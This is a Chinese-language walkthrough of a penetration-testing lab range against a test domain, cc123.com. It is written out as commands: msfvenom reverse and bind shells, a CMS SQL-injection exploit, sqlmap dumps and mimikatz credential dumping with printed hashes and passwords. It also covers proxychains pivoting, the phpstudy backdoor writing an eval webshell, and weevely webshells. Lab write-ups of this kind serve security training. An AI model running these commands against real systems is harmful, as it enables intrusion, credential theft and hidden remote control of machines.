0x00.靶场信息梗概
靶场拓扑图:
靶场目录:
0x01.环境搭建:解决kali桥接无法获取问题,以及设置静态IP
VM无法正常使用桥接模式获取IP上网(双网卡导致,解决方法是指定一张网卡)
超详细kali linux 设置固定IP地址步骤(tips:文中有个错误,iface不是inface)
vi /etc/network/interfaces
0x02.Nmap收集信息
21/tcp open ftp Microsoft ftpd
53/tcp open domain
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
999/tcp open http Microsoft IIS httpd 7.5
3389/tcp open tcpwrapped
6588/tcp open http Microsoft IIS httpd 7.5
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
999 phpmyadmin
6588 主机大师前台面板(FTP账户登录)0x03.尝试CVE_2019_07_08,失败
0x04.设置DNS服务器
sudo vi /etc/resolv.conf
nameserver 192.168.0.134问题:Win10下设置好了DNS(192.168.31.134)依然访问不了www.cc123.com。按理说应该可以访问,且主机上不了网?但恰恰相反,是不是因为配置没有生效
Win10设置好DNS(192.168.31.134)后访问不了www.cc123.com,而且上不了网,说明设置的DNS确实生效了,只不过主机用虚拟机的DNS服务可能不行,这个不太确定。而kali与web服务器设置与物理机相同内网c段的静态IP后,确实处在同一网段也可以ping通了,但是,,难道说两虚拟机把DNS服务器设置为web服务器时就上不了网,但能访问cc123,否则把DNS设置为与物理机相同的如192.168.31.1时便可以上网,且不能访问cc123,猜测如此,还待考证。Kali下的子域名爆破--wfuzz
wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H "Host:FUZZ.cc123.com" --hw 53子域名结果:
www.cc123.com;
new.cc123.com;
ww2.cc123.com;
0x05.织梦cms
1.查看cms版本号:
http://new.cc123.com/data/admin/ver.txt2./member目录开启,注册账号
3.使用dede注入的利用脚本获取管理员密码hash
Dedecms 20150618 注入漏洞(可注入管理员账户)
password is a812df726be884ddcfc41
后台-->文件式管理器上传文件拿shell
0x06.反弹shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.130 LPORT=4444 -f raw > shell5.php
use exploit/multi/handler直接反弹是不行的,得上传aspx木马才有权限。
关于在入侵中为什么aspx文件权限比较大:
aspx使用的是.net技术。IIS 中默认不支持,ASPX需要依赖于.net framework ...ASP只是脚本语言而已。ASP.NET允许用户使用IIS建立网络服务。入侵的时候...asp的木马一般是guest权限...APSX的木马一般是users权限...iis6 默认以network service身份运行。iis5默认是aspnet ASP.NET,IIS的权限机制非常复杂,对每一层应用,都有不同的权限控制。总之..要求对asp.net开放相应权限,才可以让你的网站完成相应的服务。ASP.net程序的访问权限由ASPNET的权限来决定。ASPNET隶属于Users组。所以ASPX权限就要高一些...后面那个问题,可以百度了。网上方法很多,常见的是根据角色访问控制的基本原理,给用户分配一个角色,每个角色对应一些权限,然后利用ASP.NET中的用户控件来判断该用户对应的角色是否对访问页面有访问的权力。 因为是在Windows系统环境而非在web(iis)服务器下,所以得生成一个exe木马才能执行。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.130 LPORT=4444 -f exe >s.exe/c c:\windows\debug\WIA\s.exe
执行木马,反弹成功拿到shelluse post/multi/recon/local_exploit_suggester
查看本地可以提权的漏洞
用ms16_075提权:
use exploit/windows/local/ms16_075_reflection_juicy
对grcms的测试(ww2.cc123.com):
1.gobuster的使用(web目录扫描)
2.后台抓包绕过验证码,即验证码重用
3.后台SQL注入,万能密码登录后台
4./message.asp留言板处存在存储型XSS(后台XSS)
5.cms的后台注入,发现站库分离
6.用IL SPY对dll进行反编译,进行代码审计(SQL注入)
sqlmap -r /home/kali/Desktop/moonXM4/sql2.txt -D grcms_data -T admin --dump
7.kindeditor编辑器漏洞(文件上传html,txt)
8.XSS挖掘(前台XSS,dll反编译,代码审计)
9.拿到数据库密文,通过源码dll分析加解密方法函数,以此编写解密工具(BC站中常见)
0x07.使用mimikatz获取明文和哈希
Tips:使用mimikatz最好先做一下进程迁移,不然使用过程中会话可能会挂掉,也可能获取不到
migrate
run hashdump
load mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords
wdigest/tskg
得到:
Administrator !@#Qwe123.run hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c933df09b600efabee0791aaccc43f2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
MySQL_HWS:1001:aad3b435b51404eeaad3b435b51404ee:6a75a75e4cfd3cf00faf743e17e90a53:::
PhpMyAdmin_HWS:1002:aad3b435b51404eeaad3b435b51404ee:a14b615c584d6b043f42f1cfab9779cd:::
huweishen542147:1004:aad3b435b51404eeaad3b435b51404ee:c76eea2615348c5228f7027d3ccab02d:::
cc123:1005:aad3b435b51404eeaad3b435b51404ee:afdeb425b4a55982deb4e80fa3387576:::
newcc123:1007:aad3b435b51404eeaad3b435b51404ee:97824315153b4dd665d6c688f446ebf1:::
ww2cc123:1008:aad3b435b51404eeaad3b435b51404ee:adadf2dd832421c26a96705fd09a32bd:::
0x08.socks4建立隧道,nmap扫描内网
run get_local_subnets //查看目标网段
Local subnet: 10.10.10.0/255.255.255.0
Local subnet: 192.168.0.0/255.255.255.0
run autoroute -s 10.10.10.0/24 //绑定路由
run autoroute -p //查看当前所有存活的路由
use auxiliary/server/socks4a //使用sock代理模块
/etc/proxychains.conf //proxychains配置文件
socks4 192.168.0.130 2222 //设置代理
proxychains nmap -sT -Pn 10.10.10.192 //使用sock代理进行nmap扫描0x09.正向连接,拿到数据库服务器system权限
msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe >bind.exe //生成正向连接木马
C:\inetpub\wwwroot //iis默认路径
<add key="ConnectionString" value="server=WIN-JJU7KU45PN7;database=grcms_data;uid=sa;pwd=!@#a123.." /> //配置文件web.config中得到
server=WIN-JJU7KU45PN7,1433;UID=sa;PWD=!@#a123..;database=grcms_data上传木马并执行:
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
0x10.进程迁移后抓取hash
进程迁移:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:15132c3d36a7e5d7905e02b478979046:::mimikatz抓取的hash:
mimikatz抓取的明文密码:
[0] { Administrator ; WIN-JJU7KU45PN7 ; !@#QWEasd123. }
[1] { WIN-JJU7KU45PN7 ; Administrator ; !@#QWEasd123. }
[2] { Administrator ; WIN-JJU7KU45PN7 ; !@#QWEasd123. }
获取网段信息:
run get_local_subnets:
Local subnet: 10.10.1.0/255.255.255.0
Local subnet: 10.10.10.0/255.255.255.0数据库服务器nmap扫描结果:
几个木马地址:
http://new.cc123.com/wt.asp
http://new.cc123.com/ASPXSpy2014.aspx
http://new.cc123.com/shell.php0x11.拿到最终目标web服务器权限(phpstudy后门)
利用代理访问到最终目标web服务器的页面:
phpstudy在2014 2016(php5.4) 2018(php5.2.17,5.4.45)的版本中都存在后门
将脚本url及请求方式稍加修改后运行:
proxychains3 python3 phpstudy.py "echo ^<?php
@eval(\$_GET[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"成功写入一句话后门:
利用SocksCap代理访问目标服务器。
连接weevely生成的木马 : weevely <URL> <password> [cmd]
加载session会话文件 : weevely session <path> [cmd]
生成weevely后门木马文件 : weevely generate <password> <path>weevely generate 123456 /home/kali/Desktop/moonXM4/shell2.php
proxychains3 weevely http://10.10.1.135/shell2.php 123456
//weevely连接木马
:file_upload /home/kali/bind.exe /home/kali/bind.exe //上传
:file_download shell.php /home/kali/Desktop/404.php //下载msfvenom -p php/meterpreter/bind_tcp LPORT=13666 -f raw -o x.php //生成正向连接php木马
访问x.php后exploit,www权限用菜刀上传一个msf正向连接的exe木马,虚拟终端执行后msf连接,拿到system权限。
Comments | 2 条评论
老哥项目四4的数据库还有目标机子的密码是多少啊
@777 好早之前做的,早忘咯